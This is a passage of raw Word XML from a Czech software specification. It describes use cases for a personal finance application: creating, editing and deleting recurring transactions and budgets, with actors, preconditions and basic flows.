        <w:t xml:space="preserve">UC umožňuje uživateli vytvořit novou opakovanou transakci. Tento scénář rozšiřuje scénář </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref384580658 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC16: Vytvoření nové transakce</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="008F1CD3" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="00173253" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t xml:space="preserve">Uživatel zahájil scénář </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref384580658 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC16: Vytvoření nové transakce</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém k</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">formuláři pro zadávání transakce vygeneruje další formulář </w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>pro vytváření</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opakovaných transakcí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> možnost vytvoření opakované transakce, vybere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> frekvenci jejího opakování</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> (denní, týdenní, měsíční) a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> kromě</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">běžné </w:t>
      </w:r>
      <w:r>
        <w:t>transakc</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t>e vytvoří i opakovanou transakci, která bude obsahovat stejné údaje jako právě vytvořená běžná transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00981462" w:rsidRDefault="00981462" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systém bude automaticky vytvářet nové běžné transakce dle nastavení opakované transakce.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="003601D3" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t xml:space="preserve">Nová </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">opakovaná </w:t>
      </w:r>
      <w:r>
        <w:t>transakce je uložena v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">systému a </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t>systém na základě ní automaticky vytváří nové běžné transakce</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC22: </w:t>
      </w:r>
      <w:r w:rsidR="009B4AF7">
        <w:t xml:space="preserve">Editace </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">opakované </w:t>
      </w:r>
      <w:r w:rsidR="009B4AF7">
        <w:t>transakce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="002F5FD7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t xml:space="preserve">UC umožňuje uživateli upravit existující </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">opakovanou </w:t>
      </w:r>
      <w:r>
        <w:t>transakci</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t>, která slouží jako šablona pro automaticky vytvářené transakce</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="008F1CD3" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="00173253" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">opakovaných </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">transakcí vybere transakci, kterou </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>upravit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t xml:space="preserve"> umožňující</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> změn</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nominální hodnot</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>, dat</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usk</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t>utečnění první transakce, její</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>ho</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> popis</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t>, frekvenc</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> opakování a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> označení transakce štítky. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uživatel </w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>upraví údaje</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uloží změny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="00EA15C6" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému jsou uložené změny provedené uživatelem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC23: </w:t>
      </w:r>
      <w:r w:rsidR="009B4AF7">
        <w:t xml:space="preserve">Odstranění </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">opakované </w:t>
      </w:r>
      <w:r w:rsidR="009B4AF7">
        <w:t>transakce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="00981462" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t xml:space="preserve">UC umožňuje uživateli odstranit existující </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">opakovanou </w:t>
      </w:r>
      <w:r>
        <w:t>transakci ze systému.</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> Tím nedojde k odstranění již automaticky vytvořených</w:t>
      </w:r>
      <w:r w:rsidR="00E477D9">
        <w:t xml:space="preserve"> běžných</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> transakcí na základě odstraněné opakované transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="008F1CD3" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="00173253" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>seznamu</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t xml:space="preserve"> opakovaných </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">transakcí vybere transakci, kterou </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>si přeje</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> odstranit a zvolí u ní možnost odstranit transakci.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uživatele informuje o nenávratnosti tohoto kroku a vyžádá si potvrzení uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel potvrdí svůj úmysl odstranit vybranou transakci.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="00EA15C6" w:rsidRDefault="009B4AF7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vybraná tra</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t>nsakce je odstraněna ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="009A0BD8" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel nepotvrdí svůj úmysl odstranit vybranou transakci, tak UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2DF2" w:rsidRDefault="00DD7013" w:rsidP="000B2DF2">
      <w:r>
        <w:t>Opakovaná t</w:t>
      </w:r>
      <w:r w:rsidR="009B4AF7">
        <w:t xml:space="preserve">ransakce je odstraněna </w:t>
      </w:r>
      <w:r>
        <w:t>ze systému a nebudou se na základě ní již automaticky vytvářet další běžné transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C06F82" w:rsidRDefault="00C06F82">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc387327857"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Správa rozpočtů</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>V této podkapitole jsou popsány scénáře, které se týkají správy rozpočtů. Rozpočty slouží k omezení výdajů ve zvoleném časovém období. Pomocí rozpočtu uživatel zjistí</w:t>
      </w:r>
      <w:r w:rsidR="00E477D9">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jakou část stanovené cílové částky již vydal a může podle toho přizpůsobit výdaje ve zbytku stanoveného období. Rozpočty mohou být jednorázové nebo opakované, například měsíční. Opakovaný rozpočet se po uplynutí stanovené doby sám resetuje a počítá výdaje opět od nuly.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B797B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Je možné, aby se do rozpočtu započítávaly pouze určité transakce označené vybraným štítkem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UC24: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Vytvoření nového rozpočtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>UC umožňuje uživateli vytvořit nový rozpočet.</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0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost vytvoření nového rozpočtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel vyplní název rozpočtu, omezující částku a zvolí, zda se jedná o jednorázový nebo opakovaný rozpočet. U jednorázového</w:t>
      </w:r>
      <w:r w:rsidR="00E477D9">
        <w:t xml:space="preserve"> rozpočtu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> musí zadat datum začátku a konce, u pravidelného </w:t>
      </w:r>
      <w:r w:rsidR="00E477D9">
        <w:t>je třeba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zadat počáteční datum a po jakém období se bude rozpočet opakovat (dny, týdny, měsíce). Volitelně může uživatel vyplnit popis rozpočtu a specifikovat výčet štítků, na které se bude vztahovat. Nakonec uživatel odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vytvoří nový rozpočet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="003601D3" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>Nový rozpočet je uložen v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C06F82" w:rsidRDefault="00C06F82">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC25: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Editace rozpočtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>UC umožňuje uživateli upravit existující rozpočet.</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1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu rozpočtů vybere rozpočet, který </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>si přeje</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> upravit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systém vygeneruje formulář, ve kterém je možné změnit </w:t>
      </w:r>
      <w:r w:rsidR="00E477D9">
        <w:t>název rozpočtu, omezující částku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, popis rozpočtu a výčet štítků, na které se vztahuje. U jednorázového rozpočtu je </w:t>
      </w:r>
      <w:r w:rsidR="00E477D9">
        <w:t xml:space="preserve">také </w:t>
      </w:r>
      <w:r>
        <w:t>možné upravit datum začátku a konce rozpočtu, u pravidelného počáteční datum a frekvenci opakování.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel provede požadované změny a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uloží změny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="00EA15C6" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému jsou uložené změny provedené uživatelem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C06F82" w:rsidRDefault="00C06F82">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC26: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Odstranění rozpočtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
